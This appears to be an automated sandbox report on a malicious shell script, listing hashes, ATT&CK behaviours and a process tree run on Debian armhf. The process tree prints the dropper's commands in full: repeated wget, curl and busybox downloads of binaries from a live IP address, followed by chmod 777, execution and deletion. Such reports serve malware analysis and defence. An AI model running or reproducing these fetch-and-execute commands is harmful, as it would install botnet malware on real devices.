Analysis
-
max time kernel
32s -
max time network
52s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
-
Size
10KB
-
MD5
28e68f4a8e17f58eb03239953a34f7e6
-
SHA1
ab686c91da287340dad814683646a6b42978b168
-
SHA256
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f
-
SHA512
ad6c64228000359844d7cbf7134a85387cef19f1f8d10ee5fb2c649958583cabe83458cc1a0785876804db6f37239ce2a7548eca8ad5c6aca61903a7de19b09f
-
SSDEEP
192:W0H2erUorJWr9dhjRxANRbqck7YcxQE/gYXYMpAAd5MUbYsyck7YcvQE/gYRYMp9:W0H2erUorEr9dkQYMpAAd5MUbYsMYMp9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 755 chmod 769 chmod 775 chmod 787 chmod 804 chmod 810 chmod 681 chmod 781 chmod 793 chmod 761 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 682 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS 756 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE 762 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX 770 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk 776 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p 782 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 788 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd 795 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk 805 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc 811 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 662 curl 671 busybox 682 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 684 rm 813 wget 645 wget -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS curl File opened for modification /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk curl File opened for modification /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p curl File opened for modification /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd curl File opened for modification /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN curl File opened for modification /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE curl File opened for modification /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX curl File opened for modification /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 curl File opened for modification /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk curl File opened for modification /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc curl
Processes
-
/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh1⤵PID:641
-
/bin/rm/bin/rm bins.sh2⤵PID:643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:645
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:662
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:671
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:682
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:684
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:685
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:692
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:754
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:760
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:768
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:774
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:780
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:786
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:792
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:803
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:809
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:813
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97